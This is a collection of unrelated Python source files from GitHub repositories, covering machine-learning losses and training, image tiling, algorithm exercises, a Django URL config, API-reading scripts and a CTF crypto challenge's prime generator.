Arguments:\n rootdir -- path to parent dir of all sessions (default: {'/Volumes/My Book/bandensis-dyad'})\n\n Returns:\n full path to video source dir\n '''\n src_dirs = sorted(glob.glob(os.path.join(rootdir, '2022*')), \\\n key=natsort)\n for i, sdir in enumerate(src_dirs):\n print(\"{}: {}\".format(i, os.path.split(sdir)[-1]))\n\n session_idx = int(input(\"Select IX of session to trim: \"))\n src_dir = src_dirs[session_idx]\n\n return src_dir #session\n\n","repo_name":"julianarhee/xad-analyses","sub_path":"preprocessing/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74180431287","text":"import torch\nimport torch.nn as nn\n\nimport torch.onnx\n\n\nclass CenterLoss(nn.Module):\n \"\"\"Center loss.\n Reference:\n Wen et al. A Discriminative Feature Learning Approach for Deep Face Recognition. 
ECCV 2016.\n Args:\n num_classes (int): number of classes.\n feat_dim (int): feature dimension.\n \"\"\"\n\n def __init__(self, num_classes=751, feat_dim=2048, use_gpu=True, ckpt=None, centroids=None):\n super(CenterLoss, self).__init__()\n self.num_classes = num_classes\n self.feat_dim = feat_dim\n self.use_gpu = use_gpu\n self.ckpt = ckpt\n\n if self.use_gpu:\n self.centers = nn.Parameter(torch.randn(self.num_classes, self.feat_dim, device=\"cuda\"))\n else:\n self.centers = nn.Parameter(torch.randn(self.num_classes, self.feat_dim))\n if ckpt:\n self.load(centroids)\n\n def load(self, centroids=None):\n ckpt_centers = torch.load(self.ckpt)\n ckpt_classes = ckpt_centers.size(0)\n self.centers = nn.Parameter(torch.cat((ckpt_centers,\n torch.randn(self.num_classes - ckpt_classes, self.feat_dim,\n device=\"cuda\") if centroids is None else centroids.cuda()),\n dim=0))\n\n def save(self):\n torch.save(self.centers, \"center_ckpt.pt\")\n\n def forward(self, x, labels, weights=None):\n \"\"\"\n Args:\n x: feature matrix with shape (batch_size, feat_dim).\n labels: ground truth labels with shape (num_classes).\n \"\"\"\n assert x.size(0) == labels.size(0), \"features.size(0) is not equal to labels.size(0)\"\n\n batch_size = x.size(0)\n distmat = torch.pow(x, 2).sum(dim=1, keepdim=True).expand(batch_size, self.num_classes) + \\\n torch.pow(self.centers, 2).sum(dim=1, keepdim=True).expand(self.num_classes, batch_size).t()\n distmat.addmm_(1, -2, x, self.centers.t())\n\n classes = torch.arange(self.num_classes).long()\n if self.use_gpu: classes = classes.cuda()\n labels = labels.unsqueeze(1).expand(batch_size, self.num_classes)\n mask = labels.eq(classes.expand(batch_size, self.num_classes))\n\n dist = distmat * mask.float()\n dist = dist.clamp(min=1e-12, max=1e+12)\n indices = torch.zeros(batch_size, dtype=torch.int32)\n for i in range(batch_size):\n value = distmat[i][mask[i]]\n if value.detach().cpu().numpy():\n indices[i] = 1\n if weights is not None:\n dist = dist * weights[indices == 1]\n loss = dist.sum()\n else:\n loss = dist.sum() / batch_size\n return loss\n","repo_name":"SuperbTUM/real-time-ReID-tracking","sub_path":"reid/losses/center_losses.py","file_name":"center_losses.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"17595518001","text":"\"\"\"\n\n41.\nHard\n\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def firstMissingPositive(self, nums: List[int]) -> int:\n n = len(nums)\n \n # expected: 1 to n\n count_in_range = 0\n min_elem, max_elem = n, 1\n \n for num in nums:\n if 1 <= num <= n:\n min_elem = min(min_elem, num)\n max_elem = max(max_elem, num)\n count_in_range += 1\n \n if count_in_range == 0:\n return 1\n \n # if count_in_range == n and min_elem == 1 and max_elem == n:\n # return n + 1\n \n for i in range(n):\n if nums[i] == i + 1:\n nums[i] = 'v'\n \n \n elif nums[i] != 'v' and 1 <= nums[i] <= n:\n next_pos = nums[i] - 1\n \n while nums[next_pos] != 'v' and 1 <= nums[next_pos] <= n:\n temp = nums[next_pos]\n nums[next_pos] = 'v'\n next_pos = temp - 1\n \n # previous position is a valid number. 
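(worked aside, added for illustration: the sign-marking variant firstMissingPositive2 below runs on nums = [3, 4, -1, 1] as follows: non-positives are replaced to give [3, 4, 1, 1], then the slot for each value present is negated to give [-3, 4, -1, -1]; index 1 stays positive, so the answer is 2.)\n                # 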
therefore the current position needs to be marked\n                if nums[next_pos] != 'v':\n                    nums[next_pos] = 'v'\n                if nums[i] != 'v':\n                    nums[nums[i] - 1] = 'v'\n\n        # print(nums)\n\n        for i in range(n):\n            if nums[i] != 'v':\n                return i + 1\n\n        return n + 1\n\n    def firstMissingPositive2(self, nums: List[int]) -> int:\n\n        n = len(nums)\n        if 1 not in nums:\n            return 1\n\n        # replace <= 0\n        for i in range(n):\n            if nums[i] <= 0:\n                nums[i] = 1\n\n        # mark the elements that are present\n        for i in range(n):\n            index = abs(nums[i]) - 1\n            if index < n:\n                nums[index] = - abs(nums[index])\n\n        for i in range(n):\n            if nums[i] > 0:\n                return i + 1\n        return n + 1\n\n\nif __name__=='__main__':\n\n    sol = Solution()\n\n    cases = [\n        (sol.firstMissingPositive, ([2,1], ), 3),\n        (sol.firstMissingPositive, ([-1,4,2,1,9,10], ), 3),\n        (sol.firstMissingPositive, ([0,1,2], ), 3),\n        (sol.firstMissingPositive, ([1,1], ), 2),\n        (sol.firstMissingPositive, ([3,1], ), 2),\n        (sol.firstMissingPositive, ([1,1,1], ), 2),\n        (sol.firstMissingPositive, ([1], ), 2),\n\n    ]\n\n    for i, (func, case, expected) in enumerate(cases):\n        ans = func(*case)\n        if ans == expected:\n            print(\"Case {:d} Passed\".format(i + 1))\n        else:\n            print(\"Case {:d} Failed; Expected {:s} != {:s}\".format(i+1, str(expected), str(ans)))\n","repo_name":"xys234/coding-problems","sub_path":"algo/array/find_first_missing_positive.py","file_name":"find_first_missing_positive.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19688749568","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created by Z Lei on 2019-10-05.\n\n\nclass Bucket:\n\n    def __init__(self, m=None, M=None, is_empty=True):\n        self.m = m\n        self.M = M\n        self.is_empty = is_empty\n\n    def __repr__(self):\n        return f\"({self.m} | {self.M} | {self.is_empty})\"\n\n\ndef max_sr(array):\n    if len(array) <= 1:\n        return 0\n\n    buckets = [Bucket() for i in range(len(array) + 1)]\n\n    m_value = 0\n    M_value = 0\n\n    m_value = min(array)\n    M_value = max(array)\n\n    if m_value == M_value:\n        return 0\n\n    split = (M_value - m_value) // (len(array) + 1)\n    print(split)\n    for num in array:\n\n        index = int((num - m_value)* len(array) / (M_value - m_value) )\n\n        if buckets[index].is_empty:\n            buckets[index].m = num\n            buckets[index].M = num\n            buckets[index].is_empty = False\n\n        else:\n            buckets[index].m = min(num, buckets[index].m)\n            buckets[index].M = max(num, buckets[index].M)\n\n        print(buckets[index])\n    res = 0\n\n    pre_max = buckets[0].M\n    print(buckets)\n    for i in range(1, len(buckets)):\n        if not buckets[i].is_empty:\n            res = max(res, buckets[i].m - pre_max)\n            pre_max = buckets[i].M\n    return res\n\n\nprint(max_sr([15252,16764,27963,7817,26155,20757,3478,22602,20404,6739,16790,10588,16521,6644,20880,15632,27078,25463,20124,15728,30042,16604,17223,4388,23646,32683,23688,12439,30630,3895,7926,22101,32406,21540,31799,3768,26679,21799,23740]))\n","repo_name":"Zidoing/programer_interview_guide","sub_path":"MAX.py","file_name":"MAX.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23469256742","text":"import sys\nimport math\n\nN = int(input())\narr = list(map(int,sys.stdin.readline().rstrip().split()))  # store the counts in arr\ncheck = [False]*N\nmain, sub = map(int,input().split())  # how many people the main and sub supervisors can check\ncnt=0\nfor i in range(len(arr)):\n    arr[i]-=main\n    if arr[i]<0:\n        arr[i]=0\n    cnt+=1\nfor i in range(len(arr)):\n    if arr[i]<=0:\n        continue\n    #div = 
math.ceil(arr[i]/sub)\n div = arr[i]//sub\n temp = arr[i]%sub\n if temp!=0:\n div+=1\n arr[i]=div\n\nfor i in range(len(arr)):\n cnt+=arr[i]\nprint(cnt)\n","repo_name":"SeokgyuHong/personal_study","sub_path":"코딩테스트문제풀이/삼성역량/시험감독.py","file_name":"시험감독.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21882670577","text":"import imp\nfrom django.urls import include, path\nfrom .views import *\n\nurlpatterns = [\n path('', GetProductDetailView.as_view(),\n name='get_product_detail'),\n\n path('all', GetProductsListView.as_view(), name=\"get_products_list\"),\n path('add', CreateProductView.as_view(), name=\"add_product\"),\n path('category', CreateProductCategoryView.as_view(),\n name=\"get_product_category\"),\n path('rating/update', SetProductRating.as_view(),\n name=\"update_product_rating\"),\n path('image/upload', CreateListProductImagesView.as_view(),\n name=\"get_add_product_images\"),\n path('add-to-db', AddProductsToDBView.as_view(),\n name=\"add_products_to_db\")\n\n\n\n]\n","repo_name":"arunkumarchauhan/neostore_backend","sub_path":"neostore_backend_project/product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19869393829","text":"from random import randint\nfrom time import time\nfrom quick_sort_rand import quickSortRand\nfrom quick_sort import quickSort\nfrom quick_sort_mid import quickSortMid\nimport matplotlib.pyplot as plt\nimport numpy\n\nrandomTimes = []\nfirstElementTimes = []\nmidElementTimes = []\n\nfor i in range(1000):\n L = [randint(0, 100) for i in range(1000)]\n \n # run the random pivot quick sorter\n t = time()\n quickSortRand(L)\n randomTimes.append(time() - t)\n \n # run the first element quick sorter\n t = time()\n quickSort(L)\n firstElementTimes.append(time() - t)\n \n # run the mid element quick sorter\n t = time()\n quickSortMid(L)\n midElementTimes.append(time() - t)\n \n \nplt.title(\"Sort Time Histogram\")\nplt.xlabel(\"Sort Time\")\nplt.ylabel(\"Run Count\")\n\nbins = numpy.linspace(0, 0.02, 100)\n\nplt.hist(randomTimes, bins, alpha=0.5, label='Random Pivot')\nplt.hist(midElementTimes, bins, alpha=0.5, label='Middle Element Pivot')\nplt.hist(firstElementTimes, bins, alpha=0.5, label='First Element Pivot')\nplt.legend(loc='upper right')\n\nplt.show()","repo_name":"rosskipp/grokking-algorithms","sub_path":"ch4/sort_timer.py","file_name":"sort_timer.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9191707825","text":"import os\nimport re\nimport numpy as np\nfrom PIL import Image\nfrom glob import glob\nimport shutil\nimport rasterio\n\nfrom definitions import channels_matrix, reset_dir\n\ndef preprocessTrainData(configuration, output_dir):\n \"\"\"\n This function takes in a configuration data object and based on its parameters, it processes image data,\n dividing the input raster images into smaller patches, saving them into a directory, and applying data augmentation if required.\n\n Args:\n configuration (dict): A configuration dictionary that contains the following keys:\n - 'datasets': List of dataset names to be processed.\n - 'resolutions': List of resolution levels to be considered.\n - 'channels': Channels to be included in the output.\n - 'image_size': The desired output patch size.\n - 'augment': Boolean 
flag indicating whether data augmentation should be performed.\n\n \"\"\"\n\n # Reset and get the path to the output directory\n output_directory = reset_dir(output_dir)\n\n # Loop over each dataset and resolution in the configuration\n for dataset in configuration['datasets']:\n for resolution in configuration['resolutions']:\n resolution = str(resolution).replace('.', ',')\n \n # Create a specific destination path for each dataset and resolution\n specific_destination = os.path.join(output_directory, f'{dataset}_{resolution}')\n \n # Create directory if not exists\n os.makedirs(specific_destination, exist_ok=True)\n\n # Open the raster image file and stack it into a 3D numpy array\n raster = np.stack(rasterio.open(os.path.join('dataset', resolution, f'{dataset}.tif')).read(), axis=2)\n \n # For each channel in the configuration, create patches and save them\n for channel in configuration['channels']:\n patches = createImagePatches(raster[:,:,channels_matrix.index(channel)], configuration['image_size'])\n savePatches(patches, specific_destination, name=channel)\n\n # Open the ground truth raster image, create patches and save them\n rastertruth = rasterio.open(os.path.join(os.getcwd(), 'dataset truth', resolution, f'{dataset}.tif')).read(1)\n patches = createImagePatches(rastertruth, configuration['image_size'])\n savePatches(patches, specific_destination, name='truth')\n\n # Delete all empty 'truth.png' files in the output directory\n deleteEmptyFiles(output_directory, 'truth.png')\n\n # If the configuration specifies data augmentation, perform it\n if configuration['augment']:\n augmentDatasetWithRotation(output_directory)\n\ndef preprocessTestData(raster, confData, pas, output_directory='test_examples', channelToPermute=False):\n \"\"\"\n This function is used to preprocess the test data.\n\n Args:\n raster (str): The raster file to preprocess\n confData (dict): The configuration data which contains channels and image size.\n pas (int): The step size for moving the window to create patches.\n output_directory (str): path to directory where examples will be store.\n channelToPermute (bool): Whether to permute a channel. Default is False.\n\n Returns:\n None\n \"\"\"\n # Reset the output directory\n output_directory = reset_dir(output_directory)\n\n # Stack the raster data\n raster = np.stack(raster.read(), axis=2)\n \n # For each channel in the configuration data\n for channel in confData['channels'] :\n \n # Create image patches\n patchs = createImageTestPatches(raster[:,:,channels_matrix.index(channel)], confData['image_size'], int(pas))\n \n # Save the patches to the output directory\n savePatches(patchs, output_directory, name=channel, channelToPermute = channel if channel == channelToPermute else False)\n\ndef createImagePatches(dataset_raster, patch_size):\n \"\"\"\n This function takes a raster dataset and a patch size, then divides the dataset into patches of the given size.\n Patches are created in a grid pattern starting from the top-left. 
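(worked example, added for illustration only: a 100 x 130 raster with patch_size = 32 yields a (130 // 32 + 1) x (100 // 32 + 1) = 5 x 4 grid of patches, and the right and bottom edge patches are zero-padded by 32 - 130 % 32 = 30 and 32 - 100 % 32 = 28 pixels respectively.)\n    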
Padding is added where necessary.\n\n Args:\n dataset_raster (numpy.ndarray): The input 2D raster image to be divided into patches.\n patch_size (int): The size of the square patches to be created.\n\n Returns:\n numpy.ndarray: A 4D array where the first two dimensions are the patch indices, and the last two dimensions are the patch content.\n \"\"\"\n\n # Initialize an empty array to store the patches\n patches = np.empty((dataset_raster.shape[1]//patch_size + 1, dataset_raster.shape[0]//patch_size + 1, patch_size, patch_size))\n\n # Loop over the raster image creating patches\n for h in range(0, dataset_raster.shape[0]//patch_size):\n for w in range(0, dataset_raster.shape[1]//patch_size):\n patch = dataset_raster[h*patch_size:h*patch_size+patch_size, w*patch_size:w*patch_size+patch_size] \n patches[w,h,:,:] = patch\n\n # Handle padding for remaining part in width\n remaining_width = patch_size - dataset_raster.shape[1]%patch_size\n w = dataset_raster.shape[1]//patch_size\n for h in range(0, dataset_raster.shape[0]//patch_size):\n patch = dataset_raster[h*patch_size:h*patch_size+patch_size, w*patch_size:w*patch_size+patch_size]\n patch = np.pad(patch, ((0,0), (0,remaining_width)))\n patches[w,h,:,:] = patch\n\n # Handle padding for remaining part in height\n remaining_height = patch_size - dataset_raster.shape[0]%patch_size\n h = dataset_raster.shape[0]//patch_size\n for w in range(0, dataset_raster.shape[1]//patch_size):\n patch = dataset_raster[h*patch_size:h*patch_size+patch_size, w*patch_size:w*patch_size+patch_size]\n patch = np.pad(patch, ((0,remaining_height), (0,0)))\n patches[w,h,:,:] = patch\n\n # Handle padding for the bottom right corner\n h = dataset_raster.shape[0]//patch_size\n w = dataset_raster.shape[1]//patch_size\n patch = dataset_raster[h*patch_size:h*patch_size+patch_size, w*patch_size:w*patch_size+patch_size]\n patch = np.pad(patch, ((0,remaining_height), (0,remaining_width)))\n patches[w,h,:,:] = patch\n\n return patches\n\ndef createImageTestPatches(dataset_raster, size, pas):\n \"\"\"\n This function creates image patches from the given raster dataset for testing.\n\n Args:\n dataset_raster (np.array): The raster data of the image in the form of a numpy array.\n size (int): The size of the patches to be created.\n pas (int): The step size for moving the window to create patches.\n\n Returns:\n np.array: A numpy array containing the image patches.\n \"\"\"\n # Create an empty numpy array to store the patches\n patchs = np.empty((dataset_raster.shape[1] // pas, dataset_raster.shape[0] // pas, size, size))\n\n # Iterate over the raster data to create patches\n for w in range(patchs.shape[0]):\n for h in range(patchs.shape[1]):\n # Get a patch from the raster data\n patch = dataset_raster[h*pas:h*pas+size, w*pas:w*pas+size]\n # If the patch size is not as expected, pad it to make it of the desired size\n if patch.shape[0] != size or patch.shape[1] != size : \n patch = np.pad(patch, ((0, size-patch.shape[0]), (0, size-patch.shape[1])))\n # Store the patch in the patches array\n patchs[w, h, :, :] = patch\n\n return patchs\n\n\ndef savePatches(patches, destination, name, channelToPermute=False):\n \"\"\"\n This function takes a 4D array of patches, a destination directory, a name, and a boolean flag for channel permutation.\n It then normalizes and optionally permutes the patches, and saves them as PNG images in the specified directory.\n\n Args:\n patches (numpy.ndarray): A 4D array where the first two dimensions are the patch indices, and the last two dimensions are 
the patch content.\n destination (str): The output directory where the patches should be saved.\n name (str): The base name of the output files.\n permute (bool, optional): A flag indicating whether to permute the channels of the patches. Defaults to False.\n\n \"\"\"\n\n # Loop over each patch\n for w in range(patches.shape[0]):\n for h in range(patches.shape[1]):\n \n # Create a new directory for each patch if it does not exist\n path = os.path.join(destination, f'{w}_{h}')\n if not os.path.exists(path): \n os.mkdir(path) \n\n # Normalize and optionally permute the patch\n patch = patches[w,h,:,:]\n patch = normalize(patch, name)\n patch = permuteImageChannel(patch) if channelToPermute == name else patch\n \n # Convert the patch to an image and save it\n patch_img = Image.fromarray(patch * 255).convert('L')\n patch_img.save(os.path.join(path, f'{name}.png'))\n\ndef loadPatches(confData, directory=\"test_examples\"):\n \"\"\"\n This function is used to load the image patches.\n\n Args:\n directory (str): The directory where the image patches are located.\n confData (dict): The configuration data which contains channels.\n\n Returns:\n np.array: A numpy array containing all the image patches.\n \"\"\"\n # Initialize a dictionary to store the patches\n patches_dict = {}\n\n # Get a list of all the subdirectories in the directory\n subdirectories = [d for d in os.listdir(directory) if os.path.isdir(os.path.join(directory, d))]\n\n # Iterate over each subdirectory\n for subdirectory in subdirectories:\n # Extract the width and height indices from the subdirectory name\n w, h = map(int, re.match(r'(\\d+)_(\\d+)', subdirectory).groups())\n\n # Initialize a dictionary to store the patches for this subdirectory\n patches_subdict = {}\n\n # Iterate over each channel\n for channel in confData['channels']:\n # Open the image file\n img = Image.open(os.path.join(directory, subdirectory, f'{channel}.png'))\n\n # Convert the image into a numpy array\n img_arr = np.array(img)\n\n # Add the image array to the patches subdictionary\n patches_subdict[channel] = img_arr\n\n # Convert the patches subdictionary to a multi-channel numpy array and add it to the patches dictionary\n patches_dict[(w, h)] = np.dstack(list(patches_subdict.values()))\n\n # Calculate the dimensions of the output array\n max_w = max(key[0] for key in patches_dict.keys()) + 1\n max_h = max(key[1] for key in patches_dict.keys()) + 1\n patch_size = list(patches_dict.values())[0].shape\n\n # Initialize an empty array to store the patches\n patches = np.empty((max_w, max_h, *patch_size))\n\n # Assign each patch to its position in the output array\n for (w, h), patch in patches_dict.items():\n patches[w, h, :, :, :] = patch\n\n return patches\n\ndef deleteEmptyFiles(directory, filename):\n \"\"\"\n This function checks all subdirectories of the provided directory for a file with the provided name.\n If the file is found and its content sums to zero (indicating it is an empty image), the containing directory is removed.\n\n Args:\n directory (str): The path of the directory to check.\n filename (str): The name of the file to check for.\n\n \"\"\"\n\n # Loop over all subdirectories in the specified directory\n for subdir in glob(directory + '//*//*'):\n # Open the file, if it exists, and normalize its content\n image = np.array(Image.open(os.path.join(subdir, filename))) / 255\n\n # If the sum of the image's content is zero (indicating an empty image), remove the containing directory\n if image.sum() == 0:\n shutil.rmtree(subdir)\n\ndef 
normalize(chunk, name):\n \"\"\"\n This function normalizes an array (a chunk of an image) based on its type, indicated by the provided name.\n It either scales the data to the range [0, 1] by dividing by the maximum value, or it scales and shifts the data to the range [0, 1] by subtracting the minimum value and dividing by the range.\n If all the values in the chunk are zero, it is returned as is.\n\n Args:\n chunk (numpy.ndarray): The input 2D array to be normalized.\n name (str): The name indicating the type of data in the array, used to determine the normalization method.\n\n Returns:\n numpy.ndarray: The normalized 2D array.\n\n \"\"\"\n\n # If the chunk has no positive values, return it as is\n if not chunk[chunk > 0].any():\n return chunk\n\n # For certain types of data, divide by the maximum value to scale to [0, 1]\n if name in ['heatmap', 'distance', 'speed', 'acceleration', 'bearing_deviation', 'bearing_difference']:\n chunk = chunk / np.max(chunk)\n\n # For other types of data, subtract the minimum value and divide by the range to scale and shift to [0, 1]\n elif name in ['altitude', 'slope']:\n min_val = np.min(chunk[chunk > 0]) # compute the minimum excluding zeros\n chunk = (chunk - min_val) / (np.max(chunk) - min_val + np.finfo(float).eps)\n\n return chunk\n\ndef augmentDatasetWithRotation(folderPath):\n \"\"\"\n This function performs data augmentation by rotating each image in the dataset by multiples of 90 degrees, then cropping it back to its original size.\n The augmented images are saved in new directories, following the original directory structure.\n\n Args:\n folderPath (str): The path of the directory containing the dataset to augment.\n \"\"\"\n\n # Get the paths to the example directories\n example_paths = glob(folderPath + '/*/*')\n\n # Loop over each example directory\n for ep in example_paths:\n\n # Get the paths to the channel images in the current example directory\n channel_image_paths = glob(ep + '/*')\n\n # Loop over each channel image\n for cip in channel_image_paths:\n # Load the current channel image\n ci = Image.open(cip)\n\n # Save the original image size\n original_size = (np.array(ci).shape[0], np.array(ci).shape[0]) # Original input size\n\n # Generate rotated versions of the image\n for i in range(1, 4): # Create 3 rotations\n # Calculate the rotation angle (90 degrees multiplied by the rotation index)\n rotation_angle = i * 90 \n\n # Define the output directory and ensure it exists\n dirpath = os.path.dirname(cip) + '_' + str(rotation_angle)\n filepath = os.path.basename(cip)\n if channel_image_paths.index(cip) == 0: os.mkdir(dirpath)\n\n # Rotate the image\n ci_rotated = ci.rotate(-rotation_angle, resample=Image.BICUBIC, expand=True)\n\n # Crop the image back to the original size\n width, height = ci_rotated.size\n left = (width - original_size[0]) / 2\n top = (height - original_size[1]) / 2\n right = (width + original_size[0]) / 2\n bottom = (height + original_size[1]) / 2\n ci_rotated_cropped = ci_rotated.crop((left, top, right, bottom))\n\n # Save the cropped, rotated image\n ci_rotated_cropped.save(os.path.join(dirpath, filepath))\n\ndef permuteImageChannel(image):\n \"\"\"\n This function permutes the values of an input image randomly and returns the permuted image.\n\n Args:\n image (numpy.ndarray): The input 2D array representing the image.\n\n Returns:\n numpy.ndarray: The permuted image.\n \"\"\"\n\n # Create a copy of the input image\n permuted_image = image.copy()\n\n # Randomly permute the pixels of the image\n permuted_image[:, :] 
= np.random.permutation(permuted_image[:, :].ravel()).reshape(image.shape[0], image.shape[1])\n    \n    return permuted_image\n","repo_name":"olivierschirm/code-article2","sub_path":"imageTiling.py","file_name":"imageTiling.py","file_ext":"py","file_size_in_byte":15891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"11321555681","text":"from data.ptb import PTB\n\nimport torch\nfrom loss import VAE_Loss\nfrom model import LSTM_VAE\nfrom train import Trainer\n\nfrom settings import global_setting, model_setting, training_setting\n\nfrom utils import interpolate, plot_elbo, get_latent_codes, visualize_latent_codes\n\nimport argparse\n\n# General Settings\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\ntorch.manual_seed(global_setting[\"seed\"])\n\n\nparser = argparse.ArgumentParser(description=\"A parser for baseline uniform noisy experiment\")\nparser.add_argument(\"--batch_size\", type=str, default=\"32\")\nparser.add_argument(\"--bptt\", type=str,default=\"60\")\nparser.add_argument(\"--embed_size\", type=str, default=\"300\") \nparser.add_argument(\"--hidden_size\", type=str, default=\"256\")\nparser.add_argument(\"--latent_size\", type=str, default=\"16\")\nparser.add_argument(\"--lr\", type=str, default=\"0.001\")\n\n\n# Extract commandline arguments \nargs = parser.parse_args()\n\nbatch_size = int(args.batch_size) if args.batch_size!=None else training_setting[\"batch_size\"]\nbptt = int(args.bptt) if args.bptt!=None else training_setting[\"bptt\"]\nembed_size = int(args.embed_size) if args.embed_size!=None else training_setting[\"embed_size\"]\nhidden_size = int(args.hidden_size) if args.hidden_size!=None else training_setting[\"hidden_size\"]\nlatent_size = int(args.latent_size) if args.latent_size!=None else training_setting[\"latent_size\"]\nlr = float(args.lr) if args.lr!=None else training_setting[\"lr\"]\n\n\n\n# Load the data\ntrain_data = PTB(data_dir=\"./data\", split=\"train\", create_data= False, max_sequence_length= bptt)\ntest_data = PTB(data_dir=\"./data\", split=\"test\", create_data= False, max_sequence_length=bptt)\nvalid_data = PTB(data_dir=\"./data\", split=\"valid\", create_data= False, max_sequence_length= bptt)\n\n# Batchify the data\ntrain_loader = torch.utils.data.DataLoader( dataset= train_data, batch_size=batch_size, shuffle= True)\ntest_loader = torch.utils.data.DataLoader( dataset= test_data, batch_size= batch_size, shuffle= True)\nvalid_loader = torch.utils.data.DataLoader( dataset= valid_data, batch_size= batch_size, shuffle= True)\n\n\n\nvocab_size = train_data.vocab_size\nmodel = LSTM_VAE(vocab_size = vocab_size, embed_size = embed_size, hidden_size = hidden_size, latent_size = latent_size).to(device)\n\nLoss = VAE_Loss()\noptimizer = torch.optim.Adam(model.parameters(), lr=lr)  # use the parsed learning rate instead of always falling back to the settings file\n\ntrainer = Trainer(train_loader, test_loader, model, Loss, optimizer)\n\n\n\n\nif __name__ == \"__main__\":\n\n    # Epochs\n    train_losses = []\n    test_losses = []\n    for epoch in range(training_setting[\"epochs\"]):\n        print(\"Epoch: \", epoch)\n        print(\"Training.......\")\n        train_losses = trainer.train(train_losses, epoch, batch_size, training_setting[\"clip\"])\n        print(\"Testing.......\")\n        test_losses = trainer.test(test_losses, epoch, batch_size)\n\n\n    plot_elbo(train_losses, \"train\")\n    plot_elbo(test_losses, 
\"test\")\n\n\n\n\n","repo_name":"Khamies/LSTM-Variational-AutoEncoder","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"77"} +{"seq_id":"26775759058","text":"import os\nimport yaml\n\n\ndef parse_config_file():\n \"\"\"\n Find the .splunk_logger config file in the current directory, or in the\n user's home and parse it. The one in the current directory has precedence.\n \n :return: A tuple with:\n - project_id\n - access_token\n \"\"\"\n for filename in ('.splunk_logger', os.path.expanduser('~/.splunk_logger')):\n\n project_id, access_token, api_domain = _parse_config_file_impl(filename)\n\n if project_id is not None\\\n and access_token is not None\\\n and api_domain is not None:\n return project_id, access_token, api_domain\n\n else:\n return None, None, None\n\n\ndef _parse_config_file_impl(filename):\n \"\"\"\n Format for the file is:\n \n credentials:\n project_id: ...\n access_token: ...\n api_domain: ...\n \n :param filename: The filename to parse\n :return: A tuple with:\n - project_id\n - access_token\n - api_domain\n \"\"\"\n try:\n doc = yaml.load(file(filename).read())\n \n project_id = doc[\"credentials\"][\"project_id\"]\n access_token = doc[\"credentials\"][\"access_token\"]\n api_domain = doc[\"credentials\"][\"api_domain\"]\n \n return project_id, access_token, api_domain\n except:\n return None, None, None\n\n\ndef get_config_from_env():\n return (os.environ.get('SPLUNK_PROJECT_ID', None),\n os.environ.get('SPLUNK_ACCESS_TOKEN', None),\n os.environ.get('SPLUNK_API_DOMAIN', None))","repo_name":"andresriancho/splunk-logger","sub_path":"splunk_logger/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"77"} +{"seq_id":"32675905413","text":"from Crypto.Util.number import isPrime\nimport random\nfrom math import prod\nNBITS = 512\n\nrandom.seed(\"848c895e7a650b6d51ecff9976ce5d7e\")\n\ndef gen_prime(ubound):\n while True:\n p = random.randrange((ubound - 1)//2) * 2 + 1\n if isPrime(p):\n return p\n\ndef gen_full(shared):\n while True:\n p = 2 * shared\n while p.bit_length() < NBITS:\n p *= gen_prime(shared)**random.randrange(1, 6)\n p += 1\n\n if isPrime(p):\n return p\n\nwhile True:\n shared = random.randrange(2**18, 2**19) * 2 + 1\n if isPrime(shared):\n break\n\np = gen_full(shared)\nq = gen_full(shared)\nassert p != q\n","repo_name":"ImaginaryCTF/ImaginaryCTF-2022-Challenges","sub_path":"Crypto/smoll/secret.py","file_name":"secret.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"69811878969","text":"import json\nimport os\nfrom xml.etree import ElementTree\n\nimport requests\n\nwith open(os.path.expanduser(\"~/Desktop/code/api_keys/goodreads_api_key.json\")) as f:\n api_key = json.loads(f.read())\n\nshelves_url = \"https://www.goodreads.com/shelf/list.xml\"\nreviews_url = \"https://www.goodreads.com/review/list?v=2\"\nuser_id = \"119459640\"\nshelves_params = {\"key\": api_key[\"key\"], \"user_id\": user_id}\nreviews_params = {\"shelf\": \"read\", \"key\": api_key[\"key\"]}\n\n# get my shelves\nshelves_response = requests.get(shelves_url, params=shelves_params)\nshelves_tree = ElementTree.fromstring(shelves_response.content)\n\nfor shelf in shelves_tree.find(\"shelves\").findall(\"user_shelf\"):\n name = 
shelf.find(\"name\").text\n    book_count = shelf.find(\"book_count\").text\n    print(name, book_count)\n\n    \nprint()\n","repo_name":"ayyjohn/book_info","sub_path":"to_read_list.py","file_name":"to_read_list.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
